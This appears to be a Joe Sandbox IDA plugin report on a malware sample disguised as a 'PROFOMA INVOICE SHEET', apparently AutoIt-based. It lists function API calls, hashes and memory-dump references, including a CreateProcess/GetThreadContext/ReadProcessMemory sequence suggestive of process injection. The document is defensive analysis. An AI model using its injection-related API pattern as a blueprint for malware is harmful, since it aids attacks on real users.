                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$CurrentFreeLibraryTerminate
                                    • String ID:
                                    • API String ID: 146820519-0
                                    • Opcode ID: dad776ef19108dad755d03be636a9c7b669a84ed8d424a32ca09ef46b5a48b9b
                                    • Instruction ID: 0b32e043e01460e6e0fe180ceb4a3ba897f6c4fd4d98eb0b82486dc166017b5e
                                    • Opcode Fuzzy Hash: dad776ef19108dad755d03be636a9c7b669a84ed8d424a32ca09ef46b5a48b9b
                                    • Instruction Fuzzy Hash: 8F126B719083019FC725DF28C484B6ABBE5BF89314F55899DE8898B292CB31ED45CF92
                                    APIs
                                      • Part of subcall function 00301BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00301BF4
                                      • Part of subcall function 00301BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00301BFC
                                      • Part of subcall function 00301BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00301C07
                                      • Part of subcall function 00301BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00301C12
                                      • Part of subcall function 00301BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00301C1A
                                      • Part of subcall function 00301BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00301C22
                                      • Part of subcall function 00301B4A: RegisterWindowMessageW.USER32(00000004,?,003012C4), ref: 00301BA2
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0030136A
                                    • OleInitialize.OLE32 ref: 00301388
                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 003424AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                    • String ID:
                                    • API String ID: 1986988660-0
                                    • Opcode ID: acb20e372295f52ce2564b694932506626ec88a8ea242c4ebb1724ff6961d1b1
                                    • Instruction ID: 2e370e4e3f060b330da69a5ac674c16e5521e059bfb96918d44d0fce141385d9
                                    • Opcode Fuzzy Hash: acb20e372295f52ce2564b694932506626ec88a8ea242c4ebb1724ff6961d1b1
                                    • Instruction Fuzzy Hash: 0571B2B9A13204AFC787DFB9B9556553BFABB8A344B44426BD40AC73A2E7384444CF40
                                    APIs
                                    • CloseHandle.KERNELBASE(00000000,00000000,?,?,003385CC,?,003C8CC8,0000000C), ref: 00338704
                                    • GetLastError.KERNEL32(?,003385CC,?,003C8CC8,0000000C), ref: 0033870E
                                    • __dosmaperr.LIBCMT ref: 00338739
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLast__dosmaperr
                                    • String ID:
                                    • API String ID: 2583163307-0
                                    • Opcode ID: aa8816db35906bd62fdeae052fd483ddc41b8383149647b935d244bb01ba9d2e
                                    • Instruction ID: aaaf36d9cbbc838d41a41df3f9a09c44b0b1b09fed5c6ecb1a237e553cbe6201
                                    • Opcode Fuzzy Hash: aa8816db35906bd62fdeae052fd483ddc41b8383149647b935d244bb01ba9d2e
                                    • Instruction Fuzzy Hash: A5014E3670572017D677633469C777E675D4B82774F3A021AF9159F1D2DEA1CC818150
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 003117F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: CALL
                                    • API String ID: 1385522511-4196123274
                                    • Opcode ID: d39ed21bd0cc716a7dd0d51607847fadea11281fecfadb83c63ab31268eae74e
                                    • Instruction ID: d886459ff492a02c0159dd651565c51c0b8c118e32b069d7823250b427247939
                                    • Opcode Fuzzy Hash: d39ed21bd0cc716a7dd0d51607847fadea11281fecfadb83c63ab31268eae74e
                                    • Instruction Fuzzy Hash: 8C22AC706083019FC71ADF14C491BAABBF6BF89314F14891DF9968B3A1D731E885CB92
                                    APIs
                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00303908
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_
                                    • String ID:
                                    • API String ID: 1144537725-0
                                    • Opcode ID: 476e086aafd6bca3bff7551b6262e128f2ad2bbefbaac1072ac3f12af5a79e92
                                    • Instruction ID: 74ffcc0359fe4838912dd7af9cfc8028782bf5be505237f4c1a0d7f979b7325c
                                    • Opcode Fuzzy Hash: 476e086aafd6bca3bff7551b6262e128f2ad2bbefbaac1072ac3f12af5a79e92
                                    • Instruction Fuzzy Hash: FD31C1746063019FD322DF24E894797BBECFB49308F00096EF59987280E7B1AA48CB52
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0030949C,?,00008000), ref: 00305773
                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0030949C,?,00008000), ref: 00344052
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 3a973de6d8f2c48e9dfbd09752d34b001a3aa6ca58a0bbcf6a9a1baa163b9cf7
                                    • Instruction ID: d6ef4c03d5db351862812afe717a2af53f61a33ed5077087765b17a9c84c4a8e
                                    • Opcode Fuzzy Hash: 3a973de6d8f2c48e9dfbd09752d34b001a3aa6ca58a0bbcf6a9a1baa163b9cf7
                                    • Instruction Fuzzy Hash: C6017531146325B6E3324A2ADC1EF977F98EF02BB0F158311BA9C5E1E0CBB45854DB94
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03DBAECB
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03DBAF61
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03DBAF83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                    • Instruction ID: 271617cf60e312f86d204cad691c86561c7d519bb983ae44d295ca87ea437f13
                                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                    • Instruction Fuzzy Hash: 3012CE24E24658C6EB24DF64D8507DEB232EF68700F1090E9910DEB7A5E77A4F81CF5A
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: b33d7236fd5786277b3524d1e81a9edc47fc609ffa70a754de41f0ac4678fea8
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: 3C31D575A00109DFC71ADF59E4809A9F7A5FF8D300B2586A5E80ACBA55D731EDC1DBC0
                                    APIs
                                      • Part of subcall function 00304E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00304EDD,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304E9C
                                      • Part of subcall function 00304E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00304EAE
                                      • Part of subcall function 00304E90: FreeLibrary.KERNEL32(00000000,?,?,00304EDD,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304EC0
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304EFD
                                      • Part of subcall function 00304E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00343CDE,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304E62
                                      • Part of subcall function 00304E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00304E74
                                      • Part of subcall function 00304E59: FreeLibrary.KERNEL32(00000000,?,?,00343CDE,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304E87
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Library$Load$AddressFreeProc
                                    • String ID:
                                    • API String ID: 2632591731-0
                                    • Opcode ID: e474f451956be1a059b76c3e6b5557bbd9283dc87737b6d9716652acab871f47
                                    • Instruction ID: 041b2c47c0aa5b0ea4892b252f890c162a64d1eff26591564087ec296ca8587c
                                    • Opcode Fuzzy Hash: e474f451956be1a059b76c3e6b5557bbd9283dc87737b6d9716652acab871f47
                                    • Instruction Fuzzy Hash: B2112771611206ABCF16BB60DC22FAD77A49F40711F10842DF642AF1C1EEB0AF049B54
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: __wsopen_s
                                    • String ID:
                                    • API String ID: 3347428461-0
                                    • Opcode ID: 025d79265258d2e92648c429aa9bf7c8b5452f4161876f5bb74a3fb2d7a2cb13
                                    • Instruction ID: 7821dba44bcc771353cdc41f318e548e60bdbb4d6a5490fb17b340b7e21b6353
                                    • Opcode Fuzzy Hash: 025d79265258d2e92648c429aa9bf7c8b5452f4161876f5bb74a3fb2d7a2cb13
                                    • Instruction Fuzzy Hash: 96112A7590420AAFCF1ADF59E98199E7BF9EF48314F114059FC08AB312DB31EA11CBA5
                                    APIs
                                      • Part of subcall function 00334C7D: RtlAllocateHeap.NTDLL(00000008,00301129,00000000,?,00332E29,00000001,00000364,?,?,?,0032F2DE,00333863,003D1444,?,0031FDF5,?), ref: 00334CBE
                                    • _free.LIBCMT ref: 0033506C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                    • Instruction ID: b390dc197e7b050c9a68e8737b582ee10b58dd61199ede0e138cd78ef2416b78
                                    • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                    • Instruction Fuzzy Hash: 500149B22047046BE3368F65D8C1A9AFBECFB89370F25051DE184872C0EB31A805C7B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                    • Instruction ID: 0aa66c70e7a8dce3ffc8df515c3d724c40040097a526ba5b41e3905ed70fe839
                                    • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                    • Instruction Fuzzy Hash: 2FF02832510B30ABC7333B69BC06B5B339C9F52331F110725F4209B1D2DB78E80186A5
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID:
                                    • API String ID: 176396367-0
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,00301129,00000000,?,00332E29,00000001,00000364,?,?,?,0032F2DE,00333863,003D1444,?,0031FDF5,?), ref: 00334CBE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,003D1444,?,0031FDF5,?,?,0030A976,00000010,003D1440,003013FC,?,003013C6,?,00301129), ref: 00333852
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    APIs
                                    • FreeLibrary.KERNEL32(?,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304F6D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    APIs
                                    • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0034EE51,003C3630,00000002), ref: 0036CD26
                                      • Part of subcall function 0036CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0036CD19,?,?,?), ref: 0036CC59
                                      • Part of subcall function 0036CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0036CD19,?,?,?,?,0034EE51,003C3630,00000002), ref: 0036CC6E
                                      • Part of subcall function 0036CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0036CD19,?,?,?,?,0034EE51,003C3630,00000002), ref: 0036CC7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: File$Pointer$Write
                                    • String ID:
                                    • API String ID: 3847668363-0
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00302DC4
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: LongNamePath_wcslen
                                    • String ID:
                                    • API String ID: 541455249-0
                                    APIs
                                      • Part of subcall function 00303837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00303908
                                      • Part of subcall function 0030D730: GetInputState.USER32 ref: 0030D807
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00302B6B
                                      • Part of subcall function 003030F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0030314E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                    • String ID:
                                    • API String ID: 3667716007-0
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00340704,?,?,00000000,?,00340704,00000000,0000000C), ref: 003403B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    APIs
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00301CBC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: InfoParametersSystem
                                    • String ID:
                                    • API String ID: 3098949447-0
                                    APIs
                                      • Part of subcall function 00305745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0030949C,?,00008000), ref: 00305773
                                    • GetLastError.KERNEL32(00000002,00000000), ref: 003776DE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateErrorFileLast
                                    • String ID:
                                    • API String ID: 1214770103-0
                                    APIs
                                    • CloseHandle.KERNELBASE(?,?,00000000,003424E0), ref: 00306266
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 03DBB721
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    APIs
                                      • Part of subcall function 00319BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00319BB2
                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0039961A
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0039965B
                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0039969F
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003996C9
                                    • SendMessageW.USER32 ref: 003996F2
                                    • GetKeyState.USER32(00000011), ref: 0039978B
                                    • GetKeyState.USER32(00000009), ref: 00399798
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003997AE
                                    • GetKeyState.USER32(00000010), ref: 003997B8
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003997E9
                                    • SendMessageW.USER32 ref: 00399810
                                    • SendMessageW.USER32(?,00001030,?,00397E95), ref: 00399918
                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0039992E
                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00399941
                                    • SetCapture.USER32(?), ref: 0039994A
                                    • ClientToScreen.USER32(?,?), ref: 003999AF
                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003999BC
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003999D6
                                    • ReleaseCapture.USER32 ref: 003999E1
                                    • GetCursorPos.USER32(?), ref: 00399A19
                                    • ScreenToClient.USER32(?,?), ref: 00399A26
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00399A80
                                    • SendMessageW.USER32 ref: 00399AAE
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00399AEB
                                    • SendMessageW.USER32 ref: 00399B1A
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00399B3B
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00399B4A
                                    • GetCursorPos.USER32(?), ref: 00399B68
                                    • ScreenToClient.USER32(?,?), ref: 00399B75
                                    • GetParent.USER32(?), ref: 00399B93
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00399BFA
                                    • SendMessageW.USER32 ref: 00399C2B
                                    • ClientToScreen.USER32(?,?), ref: 00399C84
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00399CB4
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00399CDE
                                    • SendMessageW.USER32 ref: 00399D01
                                    • ClientToScreen.USER32(?,?), ref: 00399D4E
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00399D82
                                      • Part of subcall function 00319944: GetWindowLongW.USER32(?,000000EB), ref: 00319952
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00399E05
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                    • String ID: @GUI_DRAGID$F$p#=
                                    • API String ID: 3429851547-3009530268
                                    APIs
                                    • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 003948F3
                                    • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00394908
                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00394927
